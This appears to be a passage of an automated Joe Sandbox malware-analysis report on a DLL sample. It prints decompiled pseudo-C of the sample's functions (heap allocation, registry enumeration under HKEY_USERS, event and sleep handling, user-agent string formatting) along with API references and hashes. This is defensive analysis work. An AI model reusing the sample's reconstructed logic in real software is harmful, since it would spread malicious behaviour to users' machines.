							_t51 =  *0x7dd32c; // 0x33b95b0
							 *_t51 = 0x7de836;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x7dd238, 0, 0x43);
							__eflags = _t36;
							 *0x7dd2c4 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x7dd25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x7dd27c; // 0x2bda5a8
								_t13 = _t58 + 0x7de55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x7dc2a7);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E007D3C3A( ~_v8 &  *0x7dd270, 0x7dd00c); // executed
								_t42 = E007DA032(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E007D9388(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E007D9E92(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E007D49F5(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x7dd160(); // executed
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E007D3D90(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x007d584c
0x007d5857
0x007d585a
0x007d585d
0x007d5860
0x007d5867
0x007d5869
0x007d5875
0x007d5877
0x007d5877
0x007d5880
0x007d5888
0x007d588b
0x007d58a5
0x007d58b1
0x007d58b3
0x007d58b8
0x007d58c2
0x007d58c2
0x007d58ba
0x007d58ba
0x007d58ba
0x007d58ba
0x007d58c9
0x007d58d6
0x007d58dd
0x007d58e2
0x007d58e2
0x007d58ea
0x007d58ed
0x007d5913
0x007d591f
0x007d5924
0x007d5926
0x007d592b
0x007d5957
0x007d5959
0x007d592d
0x007d5931
0x007d5936
0x007d593b
0x007d5942
0x007d5948
0x007d594d
0x007d5953
0x007d595a
0x007d595c
0x007d595e
0x007d596d
0x007d5973
0x007d5975
0x007d597a
0x007d59aa
0x007d59ac
0x007d597c
0x007d597c
0x007d5982
0x007d598f
0x007d5995
0x007d5995
0x007d599d
0x007d59a6
0x007d59ad
0x007d59af
0x007d59b1
0x007d59b8
0x007d59c5
0x007d59ca
0x007d59cf
0x007d59d1
0x007d59d3
0x00000000
0x00000000
0x007d59d5
0x007d59da
0x007d59dc
0x007d59e3
0x007d59e7
0x007d59ea
0x007d59ff
0x007d5a03
0x007d5a08
0x00000000
0x007d5a08
0x007d59ec
0x007d59ee
0x00000000
0x00000000
0x007d59f4
0x007d59f9
0x007d59fb
0x007d59fd
0x00000000
0x00000000
0x00000000
0x007d59fd
0x007d59e0
0x007d59e0
0x007d59b1
0x007d58ef
0x007d58ef
0x007d58f4
0x007d5a0a
0x007d5a0e
0x007d5a16
0x007d5a16
0x00000000
0x007d5a0e
0x007d58fa
0x007d58fd
0x007d5907
0x007d590e
0x00000000
0x007d5a1e
0x007d5a1e
0x007d5a22
0x007d5a26
0x007d5a26

APIs

Part of subcall function 007D7D74: GetModuleHandleA.KERNEL32(4C44544E,00000000,007D5865,00000000,00000000), ref: 007D7D83

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 007D58E2

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

memset.NTDLL ref: 007D5931
RtlInitializeCriticalSection.NTDLL(033B9570), ref: 007D5942

Part of subcall function 007D49F5: memset.NTDLL ref: 007D4A0A
Part of subcall function 007D49F5: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 007D4A3E
Part of subcall function 007D49F5: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 007D4A49

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 007D596D
wsprintfA.USER32 ref: 007D599D

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: 4f03ac72bbe171024c88f7fb7698dc9c098548e4af821629c9af790a405e5820
Instruction ID: 7a6b28559c9a23579fa2ffed5a4b023c4020cef9093274bc9dbfe8930da34188
Opcode Fuzzy Hash: 4f03ac72bbe171024c88f7fb7698dc9c098548e4af821629c9af790a405e5820
Instruction Fuzzy Hash: ED51F471A11625EBDB219BB8DC89F6E3BB8BB44710F008527F101E7391E77CAD409B65

Uniqueness

Uniqueness Score: -1.00%

Function 007D9BFA, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E007D9BFA(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				void* _t63;
				intOrPtr _t65;
				char _t68;
				void* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t86;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0x7dd33c);
					_t97 = 0x80000002;
					L6:
					_t60 = E007D4FD8(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					_t63 = E007D1599(_t98, _t103, _t107, _t97, _t60); // executed
					if(_t63 != 0) {
						L27:
						E007D6EF8(_a8);
						goto L29;
					}
					_t65 =  *0x7dd27c; // 0x2bda5a8
					_t16 = _t65 + 0x7de8fe; // 0x65696c43
					_t68 = E007D4FD8(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d007dc0, executed
						_t71 = E007D4B90(_t103,  *_t33, _t97, _a8,  *0x7dd334,  *((intOrPtr*)( *_t29 + 0x28))); // executed
						if(_t71 == 0) {
							_t72 =  *0x7dd27c; // 0x2bda5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0x7dea5f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x7de89f; // 0x55434b48
								_t73 = _t34;
							}
							if(E007D551A(_t73,  *0x7dd334,  *0x7dd338,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0x7dd27c; // 0x2bda5a8
									_t44 = _t75 + 0x7de871; // 0x74666f53
									_t78 = E007D4FD8(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d007dc0
										E007D70E0( *_t47, _t97, _a8,  *0x7dd338, _a24);
										_t49 = _t107 + 0x10; // 0x3d007dc0
										E007D70E0( *_t49, _t97, _t105,  *0x7dd330, _a16);
										E007D6EF8(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d007dc0
									E007D70E0( *_t40, _t97, _a8,  *0x7dd338, _a24);
									_t43 = _t107 + 0x10; // 0x3d007dc0
									E007D70E0( *_t43, _t97, _a8,  *0x7dd330, _a16);
								}
								if( *_t107 != 0) {
									E007D6EF8(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d007dc0, executed
					_t86 = E007D82C4( *_t21, _t97, _a8, _t68,  &_v16,  &_v12); // executed
					if(_t86 == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d007dc0
							E007D4B90(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E007D6EF8(_t106);
						_t104 = _a16;
					}
					E007D6EF8(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E007DA880(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0x7dd33c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}

0x007d9bfa
0x007d9c03
0x007d9c0a
0x007d9c0f
0x007d9c7c
0x007d9c82
0x007d9c87
0x007d9c90
0x007d9c97
0x007d9c9a
0x007d9e0e
0x007d9e15
0x007d9e15
0x007d9e1a
0x007d9e1c
0x007d9e1c
0x007d9e25
0x007d9e25
0x007d9ca0
0x007d9ca5
0x007d9cac
0x007d9e04
0x007d9e07
0x00000000
0x007d9e07
0x007d9cb2
0x007d9cb7
0x007d9cc0
0x007d9cc7
0x007d9cca
0x007d9d14
0x007d9d14
0x007d9d27
0x007d9d2a
0x007d9d31
0x007d9d39
0x007d9d3e
0x007d9d48
0x007d9d48
0x007d9d40
0x007d9d40
0x007d9d40
0x007d9d40
0x007d9d6a
0x007d9d72
0x007d9da0
0x007d9da5
0x007d9dae
0x007d9db3
0x007d9db7
0x007d9de9
0x007d9db9
0x007d9dc6
0x007d9dc9
0x007d9dd9
0x007d9ddc
0x007d9de2
0x007d9de2
0x007d9d74
0x007d9d81
0x007d9d84
0x007d9d96
0x007d9d99
0x007d9d99
0x007d9df3
0x007d9dff
0x007d9df5
0x007d9df8
0x007d9df8
0x007d9df3
0x007d9d6a
0x00000000
0x007d9d31
0x007d9cd9
0x007d9cdc
0x007d9ce3
0x007d9ce5
0x007d9cea
0x007d9cee
0x007d9cf0
0x007d9cfb
0x007d9cfe
0x007d9cfe
0x007d9d04
0x007d9d09
0x007d9d09
0x007d9d0f
0x00000000
0x007d9d0f
0x007d9c14
0x00000000
0x007d9c3b
0x007d9c3b
0x007d9c47
0x007d9c5a
0x007d9c60
0x007d9c68
0x00000000
0x007d9c68

APIs

StrChrA.SHLWAPI(007D37CC,0000005F,00000000,00000000,00000104), ref: 007D9C2D
lstrcpy.KERNEL32(?,?), ref: 007D9C5A

Part of subcall function 007D4FD8: lstrlen.KERNEL32(?,00000000,007DD330,00000001,007D4231,007DD00C,007DD00C,00000000,00000005,00000000,00000000,?,?,?,007D93A5,007D59DA), ref: 007D4FE1
Part of subcall function 007D4FD8: mbstowcs.NTDLL ref: 007D5008
Part of subcall function 007D4FD8: memset.NTDLL ref: 007D501A

Part of subcall function 007D70E0: lstrlenW.KERNEL32(007D37CC,?,?,007D9DCE,3D007DC0,80000002,007D37CC,007D8C69,74666F53,4D4C4B48,007D8C69,?,3D007DC0,80000002,007D37CC,?), ref: 007D7100

Part of subcall function 007D6EF8: RtlFreeHeap.NTDLL(00000000,00000000,007D4499,00000000,?,?,00000000), ref: 007D6F04

lstrcpy.KERNEL32(?,00000000), ref: 007D9C7C

Strings

\, xrefs: 007D9C60

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: \
API String ID: 3924217599-2967466578
Opcode ID: 2006f709fea0c7a3c707111cce74b7def91123e9b8baffa0cb750a4e6708145f
Instruction ID: 5a839685bb00691dd6dfd92d2c2f072ded44f59442aa7b715120f7759b3bbf0b
Opcode Fuzzy Hash: 2006f709fea0c7a3c707111cce74b7def91123e9b8baffa0cb750a4e6708145f
Instruction Fuzzy Hash: 45513D7610020AFFCF21EFA0DD45EAA77BABF04300F108556FA1596261E739DD25DB50

Uniqueness

Uniqueness Score: -1.00%

Function 007D84F5, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 007D854C
SysAllocString.OLEAUT32(007D9CAA), ref: 007D858F
SysFreeString.OLEAUT32(00000000), ref: 007D85A3
SysFreeString.OLEAUT32(00000000), ref: 007D85B1

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 6595eebb33c8c2f61c101f7ecf666d1393829c1365cf5a26ce4f2d1f0afbcf2c
Instruction ID: 1c7bc96d3c1352fec95cf485fdcde596e5361ac1d02bbdeec48dc00d364f9fc4
Opcode Fuzzy Hash: 6595eebb33c8c2f61c101f7ecf666d1393829c1365cf5a26ce4f2d1f0afbcf2c
Instruction Fuzzy Hash: 0B313EB1900109EFCB15DF98D8C48AE7BB9BF58300B10852FF51A9B310DB39AA55CF66

Uniqueness

Uniqueness Score: -1.00%

Function 007D8B9C, Relevance: 6.1, APIs: 4, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007D8B9C(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E007D3727(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E007D6EF8(_v28);
							goto L17;
						}
						_t42 = E007D9BFA(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E007D6EF8(_v24);
						_v20 = _v16;
						_t47 = E007D3727(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x7dd26c, 0) == 0x102);
				goto L16;
			}

0x007d8b9c
0x007d8bb6
0x007d8bb9
0x007d8bbc
0x007d8bbf
0x007d8bc2
0x007d8bc8
0x007d8bcc
0x007d8ca6
0x007d8caa
0x007d8caa
0x007d8bd5
0x007d8bdc
0x007d8be3
0x007d8be6
0x007d8c9b
0x007d8c9e
0x00000000
0x007d8ca4
0x007d8bec
0x007d8bef
0x007d8bf6
0x007d8c00
0x007d8c09
0x007d8c0f
0x007d8c17
0x007d8c4f
0x007d8c89
0x007d8c8f
0x007d8c91
0x007d8c91
0x007d8c93
0x007d8c96
0x00000000
0x007d8c96
0x007d8c64
0x007d8c69
0x007d8c6d
0x00000000
0x00000000
0x00000000
0x007d8c6d
0x007d8c1c
0x007d8c2b
0x00000000
0x00000000
0x007d8c30
0x007d8c39
0x007d8c3c
0x007d8c43
0x007d8c46
0x007d8c21
0x007d8c21
0x00000000
0x007d8c21
0x007d8c4a
0x00000000
0x007d8c4a
0x007d8c1e
0x00000000
0x007d8c6f
0x007d8c7c
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,007D37CC,?), ref: 007D8BC2

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

RegEnumKeyExA.KERNELBASE(?,?,?,007D37CC,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,007D37CC), ref: 007D8C09
WaitForSingleObject.KERNEL32(00000000,?,?,?,007D37CC,?,007D37CC,?,?,?,?,?,007D37CC,?), ref: 007D8C76
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,007D37CC,?,?,?,?,007D9F8C,?,00000001), ref: 007D8C9E

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: AllocateCloseEnumHeapObjectOpenSingleWait
String ID:
API String ID: 3664505660-0
Opcode ID: 2935b6fee22f2ac2bff2d41410991ff7977cd9cad6a9cb28451d8c9251955dbe
Instruction ID: 7163c095a98288bb2f9dd34a9cd71275e20b55c75b74b07c43ab8adb18d1dd35
Opcode Fuzzy Hash: 2935b6fee22f2ac2bff2d41410991ff7977cd9cad6a9cb28451d8c9251955dbe
Instruction Fuzzy Hash: CF314B75C01119EFCF21AFA9CD848EEFFB9EB94750F1040A7E515B2260D7784E409BA1

Uniqueness

Uniqueness Score: -1.00%

Function 007D373C, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E007D373C(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E007D86A5(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E007D7123(_t23);
						}
					}
					return _t38;
				}
				_t26 = E007D473F(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x7dd2a8, 1, 0,  *0x7dd344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E007D8B9C(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E007D9BFA(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E007DA50C(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E007D7BD6( &_v32, _t39);
					goto L13;
				}
			}

0x007d373c
0x007d3749
0x007d374f
0x007d3750
0x007d3751
0x007d3752
0x007d3753
0x007d3757
0x007d375e
0x007d3763
0x007d3767
0x007d37ef
0x007d37ef
0x007d37f2
0x007d37f4
0x007d37fc
0x007d37fc
0x007d3802
0x007d3805
0x007d3805
0x007d3802
0x007d3810
0x007d3810
0x007d3773
0x007d377a
0x007d377c
0x007d377c
0x007d3793
0x007d3797
0x007d379a
0x007d37a5
0x007d37ac
0x007d37ac
0x007d37b8
0x007d37b9
0x007d37c7
0x007d37bb
0x007d37bb
0x007d37bc
0x007d37bd
0x007d37be
0x007d37bf
0x007d37c0
0x007d37c0
0x007d37cc
0x007d37d1
0x007d37d3
0x007d37d5
0x007d37d5
0x007d37dc
0x00000000
0x007d37de
0x007d37de
0x007d37eb
0x00000000
0x007d37eb

APIs

CreateEventA.KERNEL32(007DD2A8,00000001,00000000,00000040,00000001,?,73BCF710,00000000,73BCF730,?,?,?,007D9F8C,?,00000001,?), ref: 007D378D
SetEvent.KERNEL32(00000000,?,?,?,007D9F8C,?,00000001,?,00000002,?,?,007D5A08,?), ref: 007D379A
Sleep.KERNELBASE(00000BB8,?,?,?,007D9F8C,?,00000001,?,00000002,?,?,007D5A08,?), ref: 007D37A5
CloseHandle.KERNEL32(00000000,?,?,?,007D9F8C,?,00000001,?,00000002,?,?,007D5A08,?), ref: 007D37AC

Part of subcall function 007D8B9C: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,007D37CC,?), ref: 007D8BC2
Part of subcall function 007D8B9C: RegEnumKeyExA.KERNELBASE(?,?,?,007D37CC,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,007D37CC), ref: 007D8C09
Part of subcall function 007D8B9C: WaitForSingleObject.KERNEL32(00000000,?,?,?,007D37CC,?,007D37CC,?,?,?,?,?,007D37CC,?), ref: 007D8C76
Part of subcall function 007D8B9C: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,007D37CC,?,?,?,?,007D9F8C,?,00000001), ref: 007D8C9E

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
String ID:
API String ID: 891522397-0
Opcode ID: 8eb727058ba122b9e18772c343228c4c1d91d54346219694292fcf270924faaa
Instruction ID: 6149d1a7d5cbbb1048c31fab2855c92d9fb32a07b7aeb4c4694e7f0e62b7dda1
Opcode Fuzzy Hash: 8eb727058ba122b9e18772c343228c4c1d91d54346219694292fcf270924faaa
Instruction Fuzzy Hash: 4A2156F3D00115EBDB10AFE48CC589E7779AB44360B058527FA11A7240E77C9E45C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 007D8436, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E007D8436(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E007D3727(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16); // executed
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x007d8442
0x007d8446
0x007d8447
0x007d8448
0x007d844a
0x007d844c
0x007d8451
0x007d8454
0x007d84eb
0x007d84f2
0x007d84f2
0x007d845d
0x007d8464
0x007d8474
0x007d8474
0x007d847a
0x007d847c
0x007d8481
0x007d848a
0x007d8492
0x007d8495
0x007d84a0
0x007d84a4
0x007d84a6
0x007d84a7
0x007d84b0
0x007d84b4
0x007d84c5
0x007d84b6
0x007d84bb
0x007d84c0
0x007d84cf
0x007d84cf
0x007d84a4
0x007d84d5
0x007d84db
0x007d84db
0x007d84e4
0x007d84e9
0x007d84e9
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 007D8464
lstrlenW.KERNEL32(?), ref: 007D849A
memcpy.NTDLL(00000000,?,?,?), ref: 007D84BB
SysFreeString.OLEAUT32(?), ref: 007D84CF

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 4b1cdfb5a6796a496d02a274d599cd77859b36f17856570316b1d1e6f7c3c432
Instruction ID: f7923eec83606977e1d07bdbccdfd0ad3c81702842f02c70054d7b79d51c014c
Opcode Fuzzy Hash: 4b1cdfb5a6796a496d02a274d599cd77859b36f17856570316b1d1e6f7c3c432
Instruction Fuzzy Hash: 18216575A0124AFFCB51DFA4C888D9EBBB8FF48310B1081AAE945E7310EB74DA45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 007D9A54, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E007D9A54(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E007D3727(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x7dc2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x7dc2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x007d9a5f
0x007d9a63
0x007d9a65
0x007d9a66
0x007d9a6e
0x007d9a6e
0x007d9a72
0x00000000
0x00000000
0x007d9a69
0x007d9a6a
0x007d9a6d
0x007d9a6d
0x007d9a7a
0x007d9a81
0x007d9a85
0x007d9a8d
0x007d9a93
0x007d9a95
0x007d9a9a
0x007d9a9e
0x007d9aa0
0x007d9aa3
0x007d9aaa
0x007d9aaa
0x007d9ab4
0x007d9ab7
0x007d9aba
0x007d9aba
0x007d9ac6
0x007d9ac6
0x007d9ad3

APIs

StrChrA.SHLWAPI(?,00000020,00000000,033B95AC,?,007D59CF,?,007D4106,033B95AC,?,007D59CF), ref: 007D9A6E
